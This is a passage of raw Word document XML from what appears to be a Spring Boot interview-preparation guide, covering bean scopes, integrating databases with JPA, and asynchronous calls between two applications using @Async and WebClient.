          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring IoC container</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (application context), and that same instance will be reused every time the bean is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C244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cope ensures that a single object is shared across the entire application, making it useful for beans that are meant to be stateless or are shared across multiple components in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA82B95"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109CB5A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6F21F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71C1EF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ngleton bean by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38118D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69C9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MyService will be a singleton bean, meaning only one instance will be created and used throughout the application unless you explicitly change the scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39636E9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ther scopes in Spring (other than singleton):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369586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type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created every time the bean is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214EC2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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created for each HTTP request (used in web applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659698A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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created for each HTTP session (used in web applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A84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lobal Session</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created for each global HTTP session (used in portlet-based applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A766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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single instance is created for the entire web application context, and the same instance is used across all sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF7E7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most cases, the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scope is sufficient, but you can change the scope if needed using annotations like @Scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F9F82" w14:textId="36E7269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686" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249E12B" w14:textId="21E7847F" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00C425AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="664" w:name="_Toc197867878"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which database have you used? How do you integrate databases with JPA</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="664"/>
    </w:p>
    <w:p w14:paraId="40D7750B" w14:textId="5F757126"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you can integrate a variety of relational databases with JPA (Java Persistence API) for ORM (Object-Relational Mapping). Common databases used include </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>My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ostgre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H2</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racle</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2069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ntegrate a database with JPA in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB439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Database Dependency in pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Maven): You need to add the database driver dependency in your pom.xml file. For example, for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D0C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4A48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81DDE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CFA02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E4E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F834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3B08F9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2564D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F28A1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2AA829B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054F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755EC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264E194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D2B74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717D0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57B25DF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70CB41C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0A7C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Database Connection in application.properties or application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need to specify your database connection details in application.properties or application.yml file. Example configuration for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFC8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72B10B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username=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16EC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437B38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693FC01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4DB8BFC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43A1AF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2CE021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2D77F9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6EB5452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postgresql://localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A62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ostgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A3B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D725D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780D9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postgresql.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7532E4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PostgreSQLDialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77CD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Entity Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need to create entity classes annotated with @Entity to represent database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FB2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A1D2C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C4362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01B798C" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7912D81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62F890D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74DA7C9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7CE9EAC4" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E0599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1DDAB1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69EAAAC5" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA637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05A97E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2642B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Repository Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Data JPA provides a JpaRepository or CrudRepository for data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E13E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71DC31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BD218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60D78D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE09A5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8D6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the Repository in a Service Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can inject the repository in your service class and use it to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F73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37CE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AED2C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17D2EA7A" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117A08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199DA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566BECD9" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056A1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Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE86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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC0ED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32E6A3" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C6D7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getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044447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ById(id).orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C67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965B5D" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203BCCF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3131D7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60373B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F49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54B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he Spring Boot Application</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you run the Spring Boot application, it will automatically connect to the configured database, create tables (if they don't exist), and perform CRUD operations using the JPA repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66483BB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JPA Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2817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The entity class represents a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2924F2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The repository interface allows interaction with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978F8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The service layer contains business logic and uses repositories to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E580A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JPA with Spring Boot, you can easily integrate any relational database and manage database operations with less code, leveraging the power of ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614AFE3E" w14:textId="7A73F8D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687" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEFE1C5" w14:textId="0A6B3973" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00C425AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="665" w:name="_Toc197867879"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to communicate between two spring boot applications using asynchronous calls</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="665"/>
    </w:p>
    <w:p w14:paraId="269B489C" w14:textId="36302D7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enable asynchronous communication between two Spring Boot applications, you can use several approaches, such as HTTP-based communication (using REST APIs) combined with asynchronous methods or messaging queue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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D5ADF"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1: Asynchronous Communication via REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3DA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achieve asynchronous communication between two Spring Boot applications using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asynchronous HTTP requests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how you can do it step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14706BE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able Asynchronous Support in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E78B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rst, enable asynchronous processing in Spring Boot by adding the @EnableAsync annotation in the main application class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DEB8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23462C2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sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561783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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24F7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2DF7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0684FA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688045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B1C125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synchronous Method in the Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF77F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service class, you can define methods that execute asynchronously using @Async. This allows the method to run in a separate thread, ensuring the request doesn't block the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4FA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cheduling.annotation.Async;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46725A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2C07BB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mpletableFuture;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F7235" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62ED33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E12D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19ADAEE8" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371BC1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ync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC87B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ompletableFuture&lt;String&gt; asyncMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4682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e a delay (e.g., a time-consuming task)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F9B48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318E6D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ead.sleep(5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B74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terruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785387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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790E5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C36D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ompletableFuture.completedFuture("Completed asynchronously");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E82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EEF79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23692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ll the Asynchronous Method in the Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D850E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CA6C7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354C40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4953EC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ExecutionException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A507ED" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2DDA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432909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860A033" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEE71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F875B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yService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C0F011" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C66A3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startTask")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E454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tartTask() throws ExecutionException, InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22954F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letableFuture&lt;String&gt; response = myService.asyncMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A1A1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ask started asynchronously!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36B5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D9DEE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48028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Make Asynchronous REST Calls to Another Spring Boot Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95D5F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making an asynchronous REST call from Application 1 to Application 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F022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5E5579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101579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22D598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untDownLatch;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A025B" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4952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0F097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tClientService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F11731" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741378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2A0D83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WebClient.Builder webClientBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B70B0" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119EF4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AnotherAppAsynchronously() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2795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untDownLatch latch = new CountDownLatch(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6A6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35AF2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an asynchronous call to another Spring Boot app's REST API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D953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ClientBuilder.baseUrl("http://localhost:8081") // Application 2 URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F257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1C06CD9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09B9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someEndpoint") // Endpoint in Application 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2029B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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC52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dyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24F0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oFinally(signalType -&gt; latch.countDown()) // When the call finishes, count down the latch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D340AA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bscribe(); // Start the async call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A7965" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5FF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atch.await(); // Wait for the async operation to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70EC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all completed!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133784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3D49B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E60B84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ontroller to Trigger Asynchronous Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A7B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xpose an endpoint that triggers the asynchronous call to the other application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA6F8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69C082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syncController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2BDA2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6199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439D0E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tClientService restClientService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791022CE" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1420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callOtherApp")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E30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triggerAsyncCall() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12EB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tClientService.callAnotherAppAsynchronously();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E2B0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888AE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AB898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WebClient Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7A1D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use WebClient, you need to configure it in your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669865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7F7B13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2F98B5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1071D633" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A332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7277B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lientConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C48889" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB6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A54DE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WebClient.Builder webClientBuilder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E16E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WebClient.builder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E15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988F6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67266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2: Asynchronous Communication Using Messaging (e.g., RabbitMQ or Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3963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 more scalable and decoupled solution, you can use a </w:t>
      </w:r>
